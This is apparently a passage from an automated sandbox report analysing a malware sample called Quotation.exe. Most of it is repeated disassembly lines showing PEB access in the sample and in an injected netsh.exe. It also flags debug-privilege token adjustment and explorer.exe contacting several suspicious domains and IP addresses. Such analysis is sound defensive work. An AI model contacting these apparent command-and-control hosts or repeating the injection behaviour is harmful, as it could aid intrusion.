          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CA8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C33D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C73540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C17D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C7A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C38EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C28E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C08794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0354131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03484F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03484F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03491B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03491B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0354138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03555BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03550EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03550EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03550EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_035046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03503540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03538DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03551074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03542073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03554015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03554015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03507016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03507016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03507016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03506C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03506C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03506C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03506C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_035414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03503884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03503884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.xyfs360.com
          Source: C:\Windows\explorer.exeDomain query: www.houseof2.com
          Source: C:\Windows\explorer.exeDomain query: www.clickqrcoaster.com
          Source: C:\Windows\explorer.exeDomain query: www.riceandginger.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.122 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
